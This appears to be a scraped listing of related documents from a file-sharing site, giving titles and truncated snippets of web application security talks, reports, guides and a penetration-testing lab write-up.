More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More informationWorkday Mobile Security FAQ
Workday Mobile Security FAQ Workday Mobile Security FAQ Contents The Workday Approach 2 Authentication 3 Session 3 Mobile Device Management (MDM) 3 Workday Applications 4 Web 4 Transport Security 5 Privacy
More informationAttack Vector Detail Report Atlassian
Attack Vector Detail Report Atlassian Report As Of Tuesday, March 24, 2015 Prepared By Report Description Notes cdavies@atlassian.com The Attack Vector Details report provides details of vulnerability
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationHTTP Fingerprinting and Advanced Assessment Techniques
HTTP Fingerprinting and Advanced Assessment Techniques Saumil Shah Director, Net-Square Author: Web Hacking - Attacks and Defense BlackHat 2003, Washington DC The Web Hacker s playground Web Client Web
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
More informationSAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov
Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real
More informationNational Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research
National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More informationOWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair dave.wichers@owasp.org COO, Aspect Security dave.wichers@aspectsecurity.com Copyright 2007 - The Foundation This work is available
More informationSESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER
SESSION IDENTIFIER ARE FOR NOW, PASSWORDS ARE FOREVER XSS-BASED ABUSE OF BROWSER PASSWORD MANAGERS Ben Stock, Martin Johns, Sebastian Lekies Browser choices Full disclosure: Ben was an intern with Microsoft
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationOWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
More informationWEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationSTABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
More informationOnline Vulnerability Scanner Quick Start Guide
Online Vulnerability Scanner Quick Start Guide Information in this document is subject to change without notice. Companies, names, and data used in examples herein are fictitious unless otherwise noted.
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationAdvanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
More informationRational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
More informationCTIS 256 Web Technologies II. Week # 1 Serkan GENÇ
CTIS 256 Web Technologies II Week # 1 Serkan GENÇ Introduction Aim: to be able to develop web-based applications using PHP (programming language) and mysql(dbms). Internet is a huge network structure connecting
More informationRuby on Rails Secure Coding Recommendations
Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional
More informationWeb Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
More information